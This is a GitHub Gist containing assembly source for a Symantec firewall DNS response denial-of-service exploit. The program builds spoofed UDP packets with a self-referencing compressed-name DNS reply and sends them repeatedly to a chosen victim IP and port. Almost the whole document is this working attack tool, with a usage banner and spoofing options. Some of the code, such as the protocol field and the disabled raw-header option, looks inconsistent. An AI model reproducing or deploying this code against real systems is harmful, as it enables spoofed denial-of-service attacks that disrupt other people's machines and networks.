Last active
January 7, 2023 19:37
-
-
Save farhadshiri/b37fafe87e09178e8a606da12a867eea to your computer and use it in GitHub Desktop.
DNS Response Denial-of-Service
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; HOD-symantec-firewall-DoS-expl.asm: | |
; Symantec Multiple Firewall DNS Response Denial-of-Service | |
; ------------------------------------------------------------------- | |
; By f.shiri 2020 | |
; farhad.shiri.ex@gmail.com | |
; ------------------------------------------------------------------- | |
; Tested on: | |
; - Symantec Norton Personal Firewall | |
; Systems Affected: | |
; ------------------------------------------------------------------- | |
; Assembler: | |
; Flat assembler(Fasm) or NetWide Assembler(Nasm) | |
; OS: | |
; windows x86/64 consol base program | |
; CPU Architect: | |
; IA x86/64 , AMD x86/64 | |
; Libs: | |
; winsock2 , windows standard API | |
; ------------------------------------------------------------------- | |
; Command Line Parameters/Arguments: | |
; HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int] | |
; | |
; -fi:IP From (sender) IP address | |
; -tp:int To (recipient) port number | |
; -ti:IP To (recipient) IP address | |
; -n:int Number of times to send message | |
format PE console | |
entry main | |
;include win32 macro and constant in FASM header file. | |
include 'win32ax.inc' | |
;##-Constant section-######################################################; | |
MAX_MESSAGE =4068 | |
MAX_PACKET =4096 | |
MAX_INPUT_SIZE =20h | |
DEFAULT_PORT =500 | |
DEFAULT_PORT_DNS=53 ;DNS port | |
DEFAULT_COUNT =10 | |
VALUE_OK =1 | |
IPPROTO_UDP =17 ;refered to ws2def.h in windows socket api | |
IPPROTO_IP =0 ;refered to ws2def.h in windows socket api | |
SOCKET_ERROR =-1 | |
TRUE =1 | |
DNSREPLYLEN =14 | |
SIZEOF_LONG =4 | |
TTL =128 | |
IP_SIZE =16 | |
;##-Data section-######################################################; | |
section ".data" readable writeable | |
Byte equ db | |
Word equ dw | |
Long equ dd | |
; /* Define the DNS header */ | |
_dnsreply Byte "\xc9\x9c",\ ;/* Transaction ID */ | |
"\x80\x00",\ ;/* Flags (bit 15: response) */ | |
"\x00\x01",\ ;/* Number of questions */ | |
"\x00\x01",\ ;/* Number of answer RRs */ | |
"\x00\x00",\ ;/* Number of authority RRs */ | |
"\x00\x00",\ ;/* Number of additional RRs */ | |
"\xC0\x0C" ;/* Compressed name pointer to itself */ | |
wsadata WSADATA | |
_sock Long 0 | |
_remote sockaddr_in | |
;_bOpt dd 0 | |
;/* Define the IP header */ | |
struct IP_HDR | |
ip_verlen db ? ;/* IP version & length */ | |
ip_tos db ? ;/* IP type of service */ | |
ip_ttl db ? ;/* Time to live */ | |
ip_protocol db ? ;/* Protocol */ | |
ip_totallength dw ? ;/* Total length */ | |
ip_id dw ? ;/* Unique identifier */ | |
ip_offset dw ? ;/* Fragment offset field */ | |
ip_checksum dw ? ;/* IP checksum */ | |
ip_srcaddr dd ? ;/* Source address */ | |
ip_destaddr dd ? ;/* Destination address */ | |
ends | |
_ipHdr IP_HDR | |
;/* Define the UDP header */ | |
struct UDP_HDR | |
src_portno dw ? ;/* Source port number */ | |
dst_portno dw ? ;/* Destination port number */ | |
udp_length dw ? ;/* UDP packet length */ | |
udp_checksum dw ? ;/* UDP checksum (optional) */ | |
ends | |
struct in_addr | |
union | |
struct | |
struct | |
s_b1 db ? | |
s_b2 db ? | |
s_b3 db ? | |
s_b4 db ? | |
ends | |
struct | |
s_w1 dw ? | |
s_w2 dw ? | |
ends | |
S_addr dd ? | |
ends | |
ends | |
ends | |
_addr in_addr | |
_udpHdr UDP_HDR | |
jumptable: Long case0-switchRefpoint, case1-switchRefpoint,case2-switchRefpoint | |
_iToPort Word 0 ;Port to send to | |
_iFromPort Word 0 ;Port to send from (spoof) | |
;##-bss section-######################################################; | |
section '.bss' readable writeable | |
CR equ 0xd | |
LF equ 0xa | |
NULL equ 0 | |
_lineFeeder Byte "",CR,LF | |
_debugStrHex Byte "%x",LF,CR,NULL | |
_argStr Byte 128 dup(?),LF,CR,NULL | |
_argc dd 0 | |
_progname Byte 15 dup(?),LF,CR,NULL | |
_output_handle Long ? ;pointer to std handle in windows kernel | |
_bytes_written Long ? ; Amount of bytes written | |
_input_str Byte MAX_INPUT_SIZE dup (?) ; The input string we read from the console | |
_new_line Byte LF,CR,NULL | |
_help_str1 Byte "Usage:",LF,CR,NULL | |
_help_str2 Byte "%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]",LF,CR,NULL | |
_help_str3 Byte " -fi:IP From (sender) IP address (necessary)",LF,CR,NULL | |
_help_str5 Byte " -tp:int To (recipient) open UDP port number:",LF,CR,NULL | |
_help_str6 Byte " 137, 138, 445, 500 (necessary = [default 500] )",LF,CR,NULL | |
_help_str4 Byte " -ti:IP To (recipient) IP address (optional = [default 10.0.0.1] )",LF,CR,NULL | |
_help_str7 Byte " -n:int Number of times (optional = [default 10] )",LF,CR,NULL | |
_default_ip Byte "10.0.0.1",NULL | |
_wsa_sart_err_msg Byte "[-] WSAStartup() failed: %d",LF,CR,NULL | |
_wsa_socket_err_msg Byte "[-] WSASocket() failed: %d",LF,CR,NULL | |
_openSocketString Byte "[+] Socket opened in Handle num:(%d)",LF,CR,NULL | |
_wsa_sendto_err_msg Byte "[-] WSASocket() send failed: %d",LF,CR,NULL | |
_sentBytesMsg Byte "[+] Sent %d bytes",LF,CR,NULL | |
_InfoMsg1 Byte "[*] From IP: <%s>, port: %d ",LF,CR,NULL | |
_InfoMsg2 Byte "[*] To IP: <%s>, port: %d ",LF,CR,NULL | |
_InfoMsg3 Byte "[*] Count: %d",LF,CR,NULL | |
_DDosMsg Byte "Symantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1",LF,CR,NULL | |
_dwToIPStr Byte IP_SIZE dup(?),NULL ;String IP to send to | |
_dwFromIPStr Byte IP_SIZE dup(?),NULL ;String IP to send from (spoof) | |
_dwToIP Long 0 ;IP to send to | |
_dwFromIP Long 0 ;IP to send from (spoof) | |
_iToPortStr Byte 6 dup(?),NULL ;Port to send to | |
_iFromPortStr Byte 6 dup(?),NULL ;Port to send from (spoof) | |
_dwCount Long 0 ;Number of times to send | |
_strMessage Byte MAX_MESSAGE dup(?) ;Message to send | |
;_optval Byte 50 dup(?) | |
_iTotalSize Word 0 | |
_iUdpChecksumSize Word 0 | |
_cksum Word 0 | |
_buf Byte MAX_PACKET dup(?),0 | |
;##-code section-######################################################; | |
section ".text" readable writeable executable | |
;//------------------------------------------------------------------------------\\; | |
strlen: | |
push ebp | |
mov ebp , esp | |
mov edi , dword [ebp + 8] | |
xor edx , edx | |
.loop: | |
add edx , 1 | |
cmp byte [edi+ edx - 1] , 0 | |
jnz .loop | |
mov esp , ebp | |
pop ebp | |
ret 4 | |
;//------------------------------------------------------------------------------\\; | |
my_printf: | |
push esi edi ebp | |
mov ebp , esp | |
mov esi , dword[ebp + 0x10] ;arg1: pointer to string show in consol | |
mov edx , 4 | |
push esi | |
.if eax = VALUE_OK | |
mov edi , dword[ebp + 0x14] ;arg2: pointer to string show in consol | |
add edx , 4 | |
push edi | |
.endif | |
stdcall [printf] | |
add esp ,edx | |
mov esp , ebp | |
pop ebp edi esi | |
.if eax=VALUE_OK | |
ret 8 ;stdcall convention | |
.endif | |
ret 4 ;stdcall convention | |
;//------------------------------------------------------------------------------\\; | |
show_std: | |
push ebp | |
mov ebp , esp | |
mov esi , dword[ebp + 8] ;arg1: pointer to string show in consol | |
sub esp , 4 | |
mov dword[esp] , esi | |
stdcall strlen | |
; arg1 : lpOverlapped | |
; arg2 : lpNumberOfBytesWritten | |
; arg3 : nNumberOfBytesToWrite | |
; arg4 : lpBuffer | |
; arg5 : hFile | |
;invoke WriteFile , 0 , bytes_written , edx , esi , output_handle | |
mov esp , ebp | |
pop ebp | |
ret 4 ;stdcall convention | |
;//------------------------------------------------------------------------------\\; | |
print_ebx: | |
pushad | |
jmp .print_ebx_after_data ; Skip over the local data: | |
.print_ebx_fmt Byte "%x",10,13,0 | |
.print_ebx_after_data: | |
ccall [printf],.print_ebx_fmt,ebx | |
popad ; Restore all registers. | |
ret | |
;//------------------------------------------------------------------------------\\; | |
usage: | |
push ebp | |
mov ebp , esp | |
sub esp , 4 ;micro op code | |
lea edi , dword[_new_line + 0] | |
mov dword[esp] , edi | |
stdcall my_printf | |
lea edi , dword[_help_str1 + 0] | |
sub esp , 4 | |
mov [esp] , edi | |
stdcall my_printf | |
mov eax , VALUE_OK | |
mov edi , dword[ebp + 8] ; arg1: progname string | |
push _help_str2 edi | |
stdcall my_printf | |
lea edi , dword[_help_str3 + 0] | |
sub esp , 4 | |
mov [esp] , edi | |
stdcall my_printf | |
lea edi , dword[_help_str4 + 0] | |
sub esp , 4 | |
mov [esp] , edi | |
stdcall my_printf | |
lea edi , dword[_help_str5 + 0] | |
sub esp , 4 | |
mov [esp] , edi | |
stdcall my_printf | |
lea edi , dword[_help_str6 + 0] | |
sub esp , 4 | |
mov [esp] , edi | |
stdcall my_printf | |
lea edi , dword[_help_str7 + 0] | |
sub esp , 4 | |
mov [esp] , edi | |
stdcall my_printf | |
mov esp , ebp | |
pop ebp | |
ret 4 | |
;//------------------------------------------------------------------------------\\; | |
checksum: ;checksum(WORD *buffer, SDWORD size) | |
.balanceStack equ 4 | |
.offsetLocal equ -4 | |
.size_ushort equ 2 | |
push ebp | |
mov ebp , esp | |
sub esp , 4 ;get shadow space | |
lea edx,[ebp + .offsetLocal * 1] | |
mov dword [edx] , 0 ;LWORD cksum=0; | |
;esi -> point to buffer size | |
lea esi , dword [_iUdpChecksumSize] | |
lea edi , dword [_buf] | |
xor ecx , ecx | |
while_loop: ;while (size > 1){ | |
sub dword[esi] , .size_ushort | |
jl .end_loop | |
movzx eax , word[edi + ecx] | |
lock add dword[edx] , eax | |
inc ecx | |
jmp while_loop | |
.end_loop: | |
xor eax , eax | |
cmp dword[edx] , 0x0 | |
jz .else_if | |
mov al , byte [edi + 0] | |
lock add dword [edx] , eax | |
.else_if: | |
shr dword [edx] , 16 | |
and dword [edx] , 0xffff | |
mov eax , dword [edx] | |
add dword [edx] , eax | |
shr dword [edx] , 16 | |
mov eax , dword [edx] | |
add dword [edx] , eax | |
not dword [edx] | |
mov eax , dword [edx] | |
add esp , .balanceStack ;balance the stack | |
pop ebp | |
ret | |
;//------------------------------------------------------------------------------\\; | |
parseCmdArgs: | |
.localShadowSpace equ 25 * 4 ;temp local var space needed | |
.balanceStack equ 25 * 4 ;temp local var (8*4)*4=128 , other local 1*4=4 | |
.offsetLocal equ -4 | |
.spaceChar equ 0x20 | |
push ebp | |
mov ebp , esp | |
sub esp , .balanceStack | |
lea edi , [ebp + .offsetLocal * 1] ;pointer to local argc | |
lea esi , [_argStr] ;source | |
mov word [_iToPort] , DEFAULT_PORT | |
mov word [_iFromPort] , DEFAULT_PORT_DNS | |
stdcall getNetworkAddr,_default_ip ;pointer to network addr into temp var | |
;mov edx , dword [_default_ip] | |
mov dword [_dwToIP] , eax ;inet_addr(DEFAULT_IP) | |
mov dword [_dwFromIP] , eax ;inet_addr(DEFAULT_IP) | |
mov dword [_dwCount] , DEFAULT_COUNT | |
stdcall [memcpy],_strMessage,_dnsreply,DNSREPLYLEN | |
stdcall [GetCommandLineA] | |
stdcall [CommandLineToArgvW],eax,edi | |
stdcall [wvsprintfA],esi,'%s',eax | |
sub esp , 4 ;micro op | |
mov dword [esp] , esi | |
stdcall strlen ;lenght of string in to edx | |
mov byte [esi + edx + 1] , .spaceChar ;insert end of array one space char | |
mov byte [esi + edx + 2] , LF ;insert end of array one line feed char | |
cmp edx , 35 | |
jnae .endParser | |
lea esi , [_argStr] | |
lea edi , [ebp - .localShadowSpace] ;25 * 4 equ 100 byte pointer to local var | |
xor eax , eax | |
xor edx , edx | |
mov ecx , 0x15 ;string array len is 20 = 5 * 4 dword | |
._extractLoop: | |
sub ecx , 1 ;array index counter | |
lodsb | |
stosb | |
cmp al , .spaceChar | |
jnz ._extractLoop | |
sub edi , 1 | |
cmp edx , 0 | |
je .oneSpaceRemoved | |
._nullByte: | |
test ecx , ecx | |
je ._outExtractLoop | |
mov byte[edi] , 0 | |
add edi , 1 | |
sub ecx , 1 | |
jnz ._nullByte | |
._outExtractLoop: | |
mov ecx , 0x15 | |
add edx , 1 ;arg counter | |
cmp byte [esi] , LF | |
jnz ._extractLoop | |
lea ax , word [0 * 5] ;argv[0] = binary file name | |
lea edi , [ebp - .localShadowSpace] | |
lea edi , dword [edi + 4 * eax] ;Base:edi , Index:4 , Scale:eax | |
pushad | |
ccall [memcpy],_progname,edi,15 | |
popad | |
mov [_argc] , edx | |
cmp [_argc] , 5 | |
jnz .endParser | |
;extract argument values argv[1]..argv[4] | |
xor eax , eax | |
mov ecx , 1 | |
._argCntForLoop: | |
lea ax , word [ecx * 5] ; 1=index of array -- 3=array length(5 * 4) because dword is 4 | |
lea esi , [ebp - .localShadowSpace] | |
lea esi , dword [esi + 4 * eax] | |
mov al , byte [esi] | |
cmp al , 0x2d ;argv[i][0] == '-' | |
jnz .ifswichelse | |
pushad | |
call switchArgs | |
popad | |
.ifswichelse: | |
add ecx , 1 | |
cmp ecx , 5 | |
jne ._argCntForLoop | |
.endParser: | |
add esp , .balanceStack ;balance the stack | |
mov esp , ebp | |
pop ebp | |
ret | |
.oneSpaceRemoved: | |
add esi , 1 | |
jmp ._nullByte | |
;//------------------------------------------------------------------------------\\; | |
switchArgs: ;This function implements a switch statement | |
.indexSize equ 1 | |
.scaleSize equ 4 | |
.lowerCaseMask equ 0x20 | |
.isNumberCaseMask equ 0x30 | |
movzx eax , byte [esi + .indexSize * 1] | |
or al , .lowerCaseMask ;tolower(al) | |
cmp al , 0x66 ;argv[i][1] == 'f' | |
jz .getCaseAddress | |
cmp al , 0x74 ;argv[i][1] == 't' | |
jz .getCaseAddress | |
cmp al , 0x6e ;argv[i][1] == 'n' | |
jz .getCaseAddress | |
ret | |
.getCaseAddress: | |
;calculate switch/case jump address | |
;switch/case implemented by Position Independent code, not needed GOT address. | |
shr al , 3 ; al >> 3 | |
sub al , 0xc ; al - 12 = 0 if 0x66 or 1 if 0x6e or 2 if 0x74 | |
call get_thunk_ecx ; get ecx = eip because can not direct access to eip reg | |
switchRefpoint: | |
cmp eax, 3 | |
jnb case_default ; index out of range | |
mov eax, [ecx + eax * .scaleSize + jumptable - switchRefpoint] ; read table entry | |
add eax, ecx ; The jump addresses are relative to refpoint, get absolute address | |
jmp eax ; jump to desired case | |
case0: ; ascii 'f' = 102 | |
mov al , byte [esi + .indexSize * 2] ;argv[i][2] == 'i' | |
or al , .lowerCaseMask ;tolower(al) | |
cmp al , 0x69 ;argv[i][2] == 'i' | |
jnz .OtherWise | |
movzx ax , byte [esi + .scaleSize * .indexSize] | |
test al , .isNumberCaseMask ;if(argv[i][4] is number) | |
jnp .OtherWise ;break | |
add esi , .scaleSize ;start index of src IP in array | |
lea edi , [_dwFromIPStr];dest array | |
.fiIpLoop: | |
lodsb | |
cmp al , NULL | |
jz .endfiIpLoop | |
stosb | |
jmp .fiIpLoop | |
.endfiIpLoop: | |
stdcall getNetworkAddr,_dwFromIPStr ;pointer to network addr into temp var | |
;mov eax , dword [_dwFromIPStr] ;can be write into _dwFromIPStr param because this is pointer to pointer! | |
mov dword [_dwFromIP] , eax ;convert string ip to integer ip | |
sub esi , .scaleSize | |
ret | |
.OtherWise: | |
jmp case_default | |
case1: ; ascii 'n' = 110 | |
.time_temp equ -24 | |
.shadowSpace equ 4*6 | |
push ebp | |
mov ebp , esp | |
sub esp , .shadowSpace | |
lea edi , [ebp + .time_temp * 1] ;pointer to local array | |
add esi , 3 ;start index of time array | |
mov al , byte [esi] | |
test al , .isNumberCaseMask ;if(argv[i][4] is number) | |
jnp .OtherWise ;break | |
.fiIpLoop: | |
lodsb | |
cmp al , LF | |
jz .endfiIpLoop | |
cmp al , NULL | |
jz .endfiIpLoop | |
mov byte [edi + 1] , al | |
mov [edi] , al | |
add edi , 1 | |
jmp .fiIpLoop | |
.endfiIpLoop: | |
mov byte [edi] , NULL | |
lea edi , [ebp + .time_temp * 1] ;again point to first index to local array | |
ccall [atol],edi | |
mov dword [_dwCount] , eax | |
.OtherWise: | |
add esp , .shadowSpace | |
mov esp , ebp | |
pop ebp | |
ret | |
case2: ; ascii 't' = 116 | |
movzx ax , byte [esi + .scaleSize * .indexSize] | |
test al , .isNumberCaseMask ;if(argv[i][4] is number) | |
jnp .OtherWise ;break | |
mov al , byte [esi + .indexSize * 2] | |
or al , .lowerCaseMask ;tolower(al) | |
cmp al , 0x69 ;argv[i][2] == 'i' | |
jnz .ElseIfOtherChar | |
add esi , .scaleSize ;start index of dest IP array | |
lea edi , [_dwToIPStr] ;dest array | |
.tiIpLoop: | |
lodsb | |
cmp al , NULL | |
jz .endtiIpLoop | |
stosb | |
jmp .tiIpLoop | |
.endtiIpLoop: | |
stdcall getNetworkAddr,_dwToIPStr ;pointer to network addr into temp var | |
;mov eax , dword [_dwToIPStr] ;can be write into _dwFromIPStr param because this is pointer to pointer! | |
mov dword [_dwToIP] , eax | |
sub esi , .scaleSize | |
ret | |
.ElseIfOtherChar: | |
cmp al , 0x70 ;argv[i][2] == 'p' | |
jnz .OtherWise | |
add esi , .scaleSize ;start index of src port array | |
lea edi , [_iToPortStr] ;dest array | |
.tpPortLoop: | |
lodsb | |
cmp al , NULL | |
jz .endtpPortLoop | |
stosb | |
jmp .tpPortLoop | |
.endtpPortLoop: | |
ccall [atoi] , _iToPortStr | |
mov word [_iToPort] , ax | |
sub esi , .scaleSize | |
ret | |
.OtherWise: | |
jmp case_default | |
case_default: | |
stdcall usage,_progname ;usage(argv[0]); | |
ret | |
get_thunk_ecx: ;Function for reading instruction pointer | |
mov ecx, [esp] | |
ret | |
;//------------------------------------------------------------------------------\\; | |
validateArgs: | |
.loffset equ -4 | |
push ebp | |
mov ebp , esp | |
sub esp , 4 | |
lea edx,[ebp + .loffset * 1] | |
stdcall parseCmdArgs | |
;debug message | |
;mov ebx , dword [_argc] | |
;stdcall print_ebx | |
;ccall [printf],'%d - %s',[_argc],_argStr | |
cmp dword [_argc] , 3 ;if (argc < 3) | |
jl .elseIf | |
stdcall initSocket | |
jmp .endValidFunc | |
.elseIf: | |
stdcall usage,_progname ;usage(argv[0]); | |
.endValidFunc: | |
add esp , 4 ;balance the stack | |
pop ebp | |
ret | |
;//------------------------------------------------------------------------------\\; | |
getNetworkAddr: ;void getNetwordAddr(int** net_addr) | |
push ebp | |
mov ebp , esp | |
mov edi , dword [ebp + 0x8] ;arg2 -> net_addr | |
stdcall [inet_addr],edi ;get network addr byte | |
;mov dword [edi] , eax ;*net_addr = eax write the offset | |
mov esp , ebp | |
pop ebp | |
ret 4 | |
;//------------------------------------------------------------------------------\\; | |
showInConsol: ;void showInConsol(char* msg , int lasterror) | |
push ebp | |
mov ebp , esp | |
mov esi , dword [ebp + 8] ; arg1: lasterror int num | |
mov edi , dword [ebp + 0xc] ; arg2: msg string | |
ccall [printf], edi,esi | |
mov esp , ebp | |
pop ebp | |
ret 8 | |
;//------------------------------------------------------------------------------\\; | |
dieWithMessage: | |
push ebp | |
mov ebp , esp | |
mov esi , dword [ebp + 8] | |
stdcall [WSAGetLastError] | |
stdcall showInConsol ,eax,esi ;eax = last error num | |
pop ebp | |
ret 4 | |
;//------------------------------------------------------------------------------\\; | |
proc initSocket ; void initSocket(); | |
local _netPort:DWORD,_sizeIpHdr:DWORD,_sizeUdpHdr:DWORD,_iIPSize:WORD,_iUdpSize:WORD | |
;addr.S_un.S_addr = dwFromIP; | |
;mov [_addr.S_addr] , edx ;_dwFromIP | |
;ccall [inet_ntoa] , _addr | |
movzx eax , word [_iFromPort] ;becuase printf call by value when use %d | |
pushad | |
stdcall [printf],_InfoMsg1,_dwFromIPStr, eax ;printf call by pointer when use %s | |
add esp , 0xc ;after the printf function needed balance the stack | |
popad | |
movzx eax , word [_iToPort] | |
pushad | |
stdcall [printf],_InfoMsg2,_dwToIPStr , eax | |
add esp , 0xc | |
popad | |
pushad | |
stdcall [printf],_InfoMsg3,dword [_dwCount] | |
add esp , 0x8 | |
popad | |
stdcall [WSAStartup],0101h,wsadata ;WSAStartup(MAKEWORD(2,2), &wsd) | |
cmp eax , 0 ;WSAStartup() != 0 | |
je .else_start | |
.if_start: | |
stdcall dieWithMessage ,_wsa_sart_err_msg | |
ret | |
.else_start: | |
stdcall [closesocket], _sock | |
stdcall [socket],AF_INET,SOCK_DGRAM,IPPROTO_UDP | |
cmp eax,SOCKET_ERROR ;if(sock == -1) | |
jne .else_socket | |
.if_socket: | |
stdcall dieWithMessage,_wsa_socket_err_msg | |
ret | |
.else_socket: | |
mov [_sock],eax ;socket handle number | |
mov eax , VALUE_OK | |
push _openSocketString [_sock] | |
stdcall my_printf | |
;mov dword [_bOpt] , TRUE | |
;lea edi , dword[optval] | |
;mov byte[edi + 0] , TRUE | |
;invoke setsockopt,[sock], IPPROTO_IP, IP_TTL, optval , 4 | |
;cmp eax,SOCKET_ERROR | |
;je .if_setSock | |
;jmp .else_setSock | |
;.if_setSock: | |
; call dieWithMessage | |
; ret | |
;.else_setSock: | |
;ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (const signed char *)&bOpt, sizeof(bOpt)); | |
;/* Initalize the IP header */ | |
xor ebx , ebx | |
mov [_sizeIpHdr] , sizeof.IP_HDR | |
mov [_sizeUdpHdr] , sizeof.UDP_HDR | |
add bx , word [_sizeIpHdr] | |
add bx , word [_sizeUdpHdr] | |
add bx , DNSREPLYLEN | |
mov [_iTotalSize] , bx | |
mov word[_iIPSize] , 0 | |
mov ax , word [_sizeIpHdr] | |
mov bl , SIZEOF_LONG | |
div bl | |
mov byte [_iIPSize] , bl | |
mov eax , 4 | |
shl eax , 4 | |
or ax , word [_iIPSize] | |
mov word [_ipHdr.ip_verlen] , ax | |
mov [_ipHdr.ip_tos] , 0 ;/* IP type of service */ | |
stdcall [htons],[_iTotalSize] | |
mov word [_ipHdr.ip_totallength] , ax ;/* Total packet len */ | |
mov [_ipHdr.ip_id] , 0 ;/* Unique identifier: set to 0 */ | |
mov [_ipHdr.ip_offset] , 0 ;/* Fragment offset field */ | |
mov [_ipHdr.ip_ttl] , TTL ;/* Time to live */ | |
mov [_ipHdr.ip_protocol] , PF_NETBIOS ;/* Protocol(UDP) = 0x11 */ | |
mov [_ipHdr.ip_checksum] , 0 ;/* IP checksum */ | |
mov eax , dword [_dwFromIP] ;pointer to from IP | |
mov dword [_ipHdr.ip_srcaddr] , eax ;/* Source address */ | |
mov eax , dword [_dwToIP] ;pointer to to IP | |
mov dword [_ipHdr.ip_destaddr] , eax ;/* Destination address */ | |
;/* Initalize the UDP header */ | |
xor ebx , ebx | |
add bx , word[_sizeUdpHdr] | |
add bx , DNSREPLYLEN | |
mov word [_iUdpSize] , bx | |
stdcall [htons],[_iFromPort] | |
mov dword [_udpHdr.src_portno] , eax | |
stdcall [htons],[_iToPort] | |
mov dword [_udpHdr.dst_portno] , eax | |
stdcall [htons],[_iUdpSize] | |
mov dword [_udpHdr.udp_length] , eax | |
mov [_udpHdr.udp_checksum] , 0 | |
mov [_iUdpChecksumSize] , 0 | |
lea esi , dword [_iUdpChecksumSize] | |
lea edi , dword [_buf] ;edi = &_buf | |
stdcall [memset],edi,0,MAX_PACKET | |
stdcall [memcpy],edi,_ipHdr.ip_srcaddr,sizeof.IP_HDR.ip_srcaddr ;edi = edi + 0 -> point to begin offset | |
add dword [esi] , sizeof.IP_HDR.ip_srcaddr | |
add edi , sizeof.IP_HDR.ip_destaddr ;edi = edi + 4 | |
stdcall [memcpy],edi,_ipHdr.ip_destaddr,sizeof.IP_HDR.ip_destaddr | |
add dword [esi] , sizeof.IP_HDR.ip_destaddr ;iUdpChecksumSize += sizeof(ipHdr.ip_destaddr) | |
add dword [esi] , 1 ;iUdpChecksumSize += 1; | |
add edi , 4 ;edi = edi + 4 | |
stdcall [memcpy],edi,_ipHdr.ip_protocol,sizeof.IP_HDR.ip_protocol | |
add edi , sizeof.IP_HDR.ip_protocol ;edi = edi + 1 | |
xor eax , eax | |
add word [esi] , sizeof.IP_HDR.ip_protocol ;iUdpChecksumSize += sizeof(ipHdr.ip_protocol) | |
stdcall [memcpy],edi,_udpHdr.udp_length,sizeof.UDP_HDR.udp_length | |
add edi , sizeof.UDP_HDR.udp_length ;edi = edi + 2 | |
add word [esi] , sizeof.UDP_HDR.udp_length ;iUdpChecksumSize += sizeof(ipHdr.udp_length) | |
stdcall [memcpy],edi,_udpHdr,sizeof.UDP_HDR | |
add edi , sizeof.UDP_HDR ;edi = edi + 8 | |
add word [esi] , sizeof.UDP_HDR | |
stdcall [memcpy],_strMessage,_dnsreply,DNSREPLYLEN | |
mov ecx , -1 ;i=0 | |
.for_copyMsg: | |
inc ecx ;i++ | |
xor eax , eax | |
mov al , byte [_strMessage + ecx] ; al = strMessage[i] | |
mov byte [edi + ecx] , al ; *buf[i] = al | |
cmp ecx , DNSREPLYLEN ; i < sizeof(dnsreply) | |
jnz .for_copyMsg | |
add word [esi] , DNSREPLYLEN | |
stdcall checksum | |
mov [_udpHdr.udp_checksum] , ax ;eax = return checksum value from checksum() | |
stdcall [memcpy],edi,_ipHdr,sizeof.IP_HDR | |
add edi , sizeof.IP_HDR ;edi = edi + sizeof.IDP_HDR | |
stdcall [memcpy],edi,_udpHdr,sizeof.UDP_HDR | |
add edi , sizeof.UDP_HDR ;edi = edi + UDP_HDR | |
stdcall [memcpy],edi,_strMessage,DNSREPLYLEN | |
mov [_remote.sin_family] , AF_INET | |
stdcall [htons],[_iToPort] | |
mov word [_iToPort] , ax | |
mov [_remote.sin_port] , ax ;htons(iToPort) | |
mov eax , dword [_dwToIP] | |
mov [_remote.sin_addr] , eax ;dwToIP | |
mov esi , dword [_remote] | |
xor ebx , ebx | |
;_sock = socket handle number | |
;_buf = buffer to sending to udp | |
;_iTotalSize = size of buffer | |
;esi = pointer to sockaddr_in structure | |
.forSendTo: | |
stdcall [sendto],[_sock],_buf,[_iTotalSize],0,esi,sizeof.sockaddr_in | |
cmp eax,SOCKET_ERROR ;if(sending byte == -1) | |
jne .else_sendto | |
.if_sendto: | |
stdcall dieWithMessage, _wsa_sendto_err_msg | |
jmp .endFor | |
.else_sendto: | |
stdcall showInConsol,eax, _sentBytesMsg ;eax = last error num | |
add ebx , 1 | |
cmp ebx ,[_dwCount] | |
jne .forSendTo | |
.endFor: | |
stdcall [closesocket], _sock | |
stdcall [WSACleanup] | |
;infinite loop | |
;char* ptr = new char[5]; | |
;for(int i = 0 ; i < strlen(_buf)+1 ; i+=4 ){ | |
; *ptr = _buf[i]; | |
; *(ptr + 1)= _buf[i+1]; | |
; *(ptr + 2)= _buf[i+2]; | |
; *(ptr + 3)= _buf[i+3]; | |
; *(ptr + 4)= '\0'; | |
; std::cout << ptr << '\n'; | |
;} | |
;show content of array _buf | |
xor ecx , ecx | |
lea edi , dword [_buf] | |
movzx edx , word [_iTotalSize] | |
.loopShow: | |
movzx ebx , word [edi + ecx] | |
ccall print_ebx | |
add ecx , 2 | |
cmp ecx , edx | |
jnz .loopShow | |
ret | |
endp | |
;//------------------------------------------------------------------------------\\; | |
main: | |
push ebp | |
mov ebp , esp | |
ccall [printf],_DDosMsg,CR,LF | |
stdcall validateArgs | |
;Obtain output handle | |
;stdcall [GetStdHandle] , STD_OUTPUT_HANDLE | |
;mov dword [output_handle],eax | |
;sub esp , 4 | |
;mov dword[esp] , eax | |
;stdcall show_std | |
;mov eax , dword[ebp + 8] | |
pop ebp | |
push 0 | |
call [ExitProcess] | |
;##-include API section-######################################################; | |
section '.idata' import data readable | |
library kernel,'KERNEL32.DLL',\ | |
msvcrt,'MSVCRT.DLL',\ | |
winsock,'WSOCK32.DLL',\ | |
shell32,'SHELL32.dll',\ | |
User32,'USER32' | |
import User32,\ | |
wvsprintfA,'wvsprintfA' | |
import kernel,\ | |
ExitProcess,'ExitProcess',\ | |
GetStdHandle,'GetStdHandle',\ | |
GetCommandLineA,'GetCommandLineA',\ | |
lstrlenA,'lstrlenA',\ | |
GetCommandLineW,'GetCommandLineW' | |
import msvcrt,\ | |
printf, 'printf',\ | |
memset, 'memset',\ | |
memcpy, 'memcpy',\ | |
atoi , 'atoi' ,\ | |
atol , 'atol' ,\ | |
strtoul, 'strtoul' | |
import winsock,\ | |
WSAStartup,'WSAStartup',\ | |
WSACleanup,'WSACleanup',\ | |
WSAAsyncSelect,'WSAAsyncSelect',\ | |
inet_addr,'inet_addr',\ | |
WSAGetLastError,'WSAGetLastError',\ | |
gethostbyname,'gethostbyname',\ | |
socket,'socket',\ | |
setsockopt,'setsockopt',\ | |
htons,'htons',\ | |
bind,'bind',\ | |
listen,'listen',\ | |
accept,'accept',\ | |
connect,'connect',\ | |
recv,'recv',\ | |
send,'send',\ | |
sendto,'sendto',\ | |
inet_ntoa, 'inet_ntoa',\ | |
closesocket,'closesocket' | |
include '/API/SHELL32.INC' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment